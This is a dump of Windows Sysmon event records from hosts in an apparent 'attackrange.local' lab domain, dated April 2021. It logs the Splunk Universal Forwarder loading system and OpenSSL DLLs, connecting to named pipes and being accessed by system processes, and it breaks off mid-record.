19:18:25.508{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095215Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:25.073{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0519E80E5D610AEC3B9DFDF16259F621,SHA256=8E1B76D74EDE632C040E64FAC32E4D1BA41B008B6B18F67D22CBC4B88E1DB972,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001095224Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:26.556{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBD4747511DB84730D630F1ACD6D2FE3,SHA256=5D18D62FBBE6973A3841F78DAD7ADAF0D7B7A4CD286C0CF73193888CBC57DE42,IMPHASH=00000000000000000000000000000000falsetrue 534500x80000000000000001606178Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.588{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe 734700x80000000000000001606177Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.588{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x80000000000000001606176Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.588{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x80000000000000001606175Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.588{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 734700x80000000000000001606174Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x80000000000000001606173Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\rsaenh.dll10.0.14393.2969 (rs1_release.190503-1820)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=B6E99FD898E948657373BB02708C7C00,SHA256=90476029BD7AB0FEC53AAE567AE53BC0B09C7C5C8C7B8F19485BA872B74ED591trueMicrosoft WindowsValid 734700x80000000000000001606172Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x80000000000000001606171Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe 734700x80000000000000001606170Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x80000000000000001606169Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe 734700x80000000000000001606168Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\bcrypt.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=51F4F9025E6D236F5BF2C24C09E42C8E,SHA256=AE196933C3E292680C83B09F24CE9E6D498E34ECDD30ACB8C1544EEB4705F285trueMicrosoft WindowsValid 734700x80000000000000001606167Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x80000000000000001606166Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x80000000000000001606165Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x80000000000000001606164Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x80000000000000001606163Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x80000000000000001606162Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\oleaut32.dll10.0.14393.4225 (rs1_release.210127-1811)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=BB3CFF02CD7B7C5704A3E8C77DC0C199,SHA256=016E4F1366708D0F7AD7017CDFCACBDC770C972B63E579EE9A20A98CD3301931trueMicrosoft WindowsValid 734700x80000000000000001606161Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=E92A3F429653A81E4C53A0B474A817A5,SHA256=4ECAFDB8F0F20BFFC1A5516882FD59C961DEACC2B01F669ABF1D1895F6F90A55trueMicrosoft WindowsValid 734700x80000000000000001606160Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\combase.dll10.0.14393.4350 (rs1_release.210407-2154)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=88632FDECDE467B887C3594BE2EC545C,SHA256=FFED4D80961917C785063411ED15CED1DB6588AD925E76D72E1BF684FFDBF25DtrueMicrosoft WindowsValid 734700x80000000000000001606159Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x80000000000000001606158Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x80000000000000001606157Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x80000000000000001606156Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x80000000000000001606155Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\gdi32full.dll10.0.14393.4350 (rs1_release.210407-2154)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F9FE858A976B6D38FD5CEA46019B246A,SHA256=37F7417D0AA2A15121A14CF176F0C4A1B6BB01E290324CCA0DDB001F47E8C458trueMicrosoft WindowsValid 734700x80000000000000001606154Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x80000000000000001606153Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x80000000000000001606152Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x80000000000000001606151Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x80000000000000001606150Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x80000000000000001606149Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x80000000000000001606148Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x80000000000000001606147Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4350 (rs1_release.210407-2154)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=BC930981DA6E598A6A2E87D8355CB38A,SHA256=34DB9A305C0574B5C1694A499221B520DFB2BFD894D8E95096ABF09F1182D758trueMicrosoft WindowsValid 734700x80000000000000001606146Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x80000000000000001606145Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x80000000000000001606144Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x80000000000000001606143Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x80000000000000001606142Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x80000000000000001606141Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x80000000000000001606140Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x80000000000000001606139Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x80000000000000001606138Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\fltLib.dll10.0.14393.0 (rs1_release.160715-1616)Filter LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationfilterLib.dllMD5=051ABD8360BDA63A1BC77C662FBF0A25,SHA256=C914E2DBAEC2C9A11923A984B30A979637D3A27B3C29E93F4C90FB1D9FBC518FtrueMicrosoft WindowsValid 734700x80000000000000001606137Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\advapi32.dll10.0.14393.2969 (rs1_release.190503-1820)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=F5442C4B9A99C3AED71BED79AC46DAD1,SHA256=05F47403F3BD93FB11F39A5CB4D6E4DD08B35FF4FA3D4969D8E5396D38FB484BtrueMicrosoft WindowsValid 10341000x80000000000000001606136Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.465{21761711-842B-607D-9B00-00000000BB01}31683556C:\Windows\system32\conhost.exe{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001606135Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x80000000000000001606134Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x80000000000000001606133Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ntdll.dll10.0.14393.4350 (rs1_release.210407-2154)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=4C8F6DF16BD8E2739EC0D3439EA7507C,SHA256=79E203951A298D2818A9484A56521FA70DF19B7053F704378375128C7C48E8EEtrueMicrosoft WindowsValid 734700x80000000000000001606132Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.465{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exeMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3trueSplunk, Inc.Valid 10341000x80000000000000001606131Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.465{21761711-83AC-607D-0500-00000000BB01}412528C:\Windows\system32\csrss.exe{21761711-7A82-6080-C260-00000000BB01}8136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001606130Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:26.450{21761711-842A-607D-9700-00000000BB01}37163760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{21761711-7A82-6080-C260-00000000BB01}8136C:\Program 